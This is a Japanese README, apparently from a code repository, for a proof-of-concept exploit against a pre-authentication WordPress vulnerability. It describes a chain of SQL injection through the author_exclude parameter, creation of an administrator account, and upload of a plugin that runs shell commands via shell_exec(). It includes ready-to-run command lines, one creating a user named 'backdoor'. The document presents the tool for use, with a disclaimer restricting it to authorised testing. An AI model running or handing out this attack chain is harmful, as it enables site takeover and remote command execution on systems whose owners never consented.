
CVE-2026-63030の概念実証エクスプロイト。WordPress(バージョン6.9.0から7.0.1)における認証前の脆弱性。
CVE-2026-63030の概念実証エクスプロイトです。これはWordPress(バージョン6.9.0〜7.0.1)における認証前の脆弱性です。以下のチェーンを利用します:
author_exclude パラメータによるSQLインジェクションpython3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
| Argument | Description |
|---|---|
--url | 対象WordPressのルートURL(必須) |
--username | 作成する管理者ユーザー名(省略時は自動生成) |
--password | 管理者パスワード(省略時は自動生成) |
--email | 管理者メールアドレス(省略時は自動生成) |
--command, -c | プラグイン経由で実行するコマンド(デフォルト: id) |
--post-id | 公開済み投稿IDを指定(省略時は自動検出) |
--timeout | HTTPタイムアウト秒数(デフォルト: 60) |
# Auto-exploit with random admin credentials and run 'id'
python3 exploit.py --url http://192.168.1.100/wordpress/
# Custom admin and command
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude パラメータを含む細工されたバッチリクエストを送信し、ルート混乱を悪用してUNIONクエリを実行します。shell_exec() でシステムコマンドを実行する最小限のプラグインをアップロードします。これはコンセプト実証(PoC)のみを目的としています。
使用目的は以下に限定されます:
所有していないシステム、または明示的な書面によるテスト許可がないシステムに対しては使用しないでください。作者は誤用について一切の責任を負いません。
wp-config.php がある場合、SQLiは失敗する可能性があります。DISALLOW_FILE_MODS と DISALLOW_UNFILTERED_HTML を無効にしてください。